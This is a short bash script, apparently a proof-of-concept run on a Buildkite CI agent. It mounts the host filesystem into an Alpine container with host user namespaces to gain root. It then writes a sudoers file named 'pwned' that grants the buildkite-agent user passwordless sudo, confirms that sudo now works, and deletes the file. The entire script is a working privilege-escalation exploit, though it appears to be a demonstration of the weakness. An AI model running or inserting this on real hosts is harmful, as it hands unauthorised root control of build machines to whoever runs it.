#!/usr/bin/env bash

set -euo pipefail

run-as-root() {
  docker run --userns=host -v /:/mnt/host -w /mnt/host alpine:latest "$@"
}

echo ~~~ Creating file as root
run-as-root touch file-created-as-root

echo +++ Checking /
ls -lA /

echo ~~~ Cleaning up
run-as-root rm file-created-as-root

echo +++ Checking /
ls -lA /

echo +++ Checking /etc
ls -lA /etc
run-as-root ls -lA etc/sudoers.d

echo +++ Who am I?
echo I am: "$(whoami)"
echo sudo I am: "$(sudo --non-interactive whoami || echo "sudo failed")"

echo --- Modifying sudoers
run-as-root sh -c 'echo "buildkite-agent ALL=(ALL) NOPASSWD: ALL" > etc/sudoers.d/pwned'

echo +++ Who am I?
echo I am: "$(whoami)"
echo sudo I am: "$(sudo --non-interactive whoami || echo "sudo failed")"

echo --- Cleaning up
run-as-root rm -f etc/sudoers.d/pwned
